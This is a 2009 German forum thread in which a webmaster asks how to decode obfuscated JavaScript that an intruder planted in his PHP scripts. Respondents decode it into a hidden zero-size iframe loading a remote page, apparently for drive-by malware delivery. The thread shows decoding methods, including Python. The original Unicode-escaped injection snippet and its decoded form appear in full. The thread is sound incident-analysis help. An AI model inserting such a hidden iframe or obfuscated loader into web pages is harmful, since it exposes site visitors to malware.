35801
Apr 08, 2009, updated at May 13, 2009 (UTC)
5667
9
0
Was bedeutet das bzw. was kann ich bei sowas lesbar machen
Ich habe ein einer meiner PHP Scripte folgendes gefunden...
Scheinbar eine hinterlassenschaft eines netten Menschen, der sich illegal zu meinem Webspace Zugang verschafft hat... Wie kann ich sowas wieder leesbar machen bzw. herausfinden was das eigentlich tut?
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script> 
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 113508
Url: https://administrator.de/contentid/113508
Printed on: April 26, 2024 at 06:04 o'clock
9 Comments
Latest comment
Hi,
nach einer kurzen google suche komm denke ich das hier hilft dir.
http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687
gruß
Woolfsmann
nach einer kurzen google suche komm denke ich das hier hilft dir.
http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687
gruß
Woolfsmann
Danke... Hab mal in den Artikel reingesehen... aber wie und womit DECODIERT man das ??
Ich müsste wissen was das macht.
Ich müsste wissen was das macht.
Hi,
Und der versucht dann sicher einen trojaner per drive-by download auszuliefern.
lg,
Slainte
Ich müsste wissen was das macht.
das script fuegt einen unsichtbaren iframe auf Deiner Seite ein:<iframe src="http://.../in.php" width=0 height=0 style='display:none'></iframe> lg,
Slainte
OK Danke!
Aber wie hast du das decodiert?
Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
Aber wie hast du das decodiert?
Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
Das ist leicht zu "decodieren". Du schnapst dir eine ASCII-Tabelle und los gehts.
So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
miniversum
\u003c
bedeutet z.B. für den Hexwert 0x3C. Schaust du den in einer ASCII Tabelle nach erhällst du dafür das Zeichen "<".So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063
ergeben somit<iframe src=
miniversum
oder Du ersetzt das "document.write" einfach durch ein "alert" 
Moin diaz1983,
diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.
Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:
\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
wie SlainteMhath schon vorgeturnt hat.
Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.
Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:
\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
wie SlainteMhath schon vorgeturnt hat.
Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
Hab noch ne nette Methode gefunden...
Zumindest mit Python ging das ganz einfach auf meinem Fedora-System
Zumindest mit Python ging das ganz einfach auf meinem Fedora-System
[peter@fedoraPC ~]# python
Python 2.5.2 (r252:60911, Sep 30 2008, 15:41:38)
[GCC 4.3.2 20080917 (Red Hat 4.3.2-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> print u"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e"
<iframe src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>
OK Danke...
Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...
Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...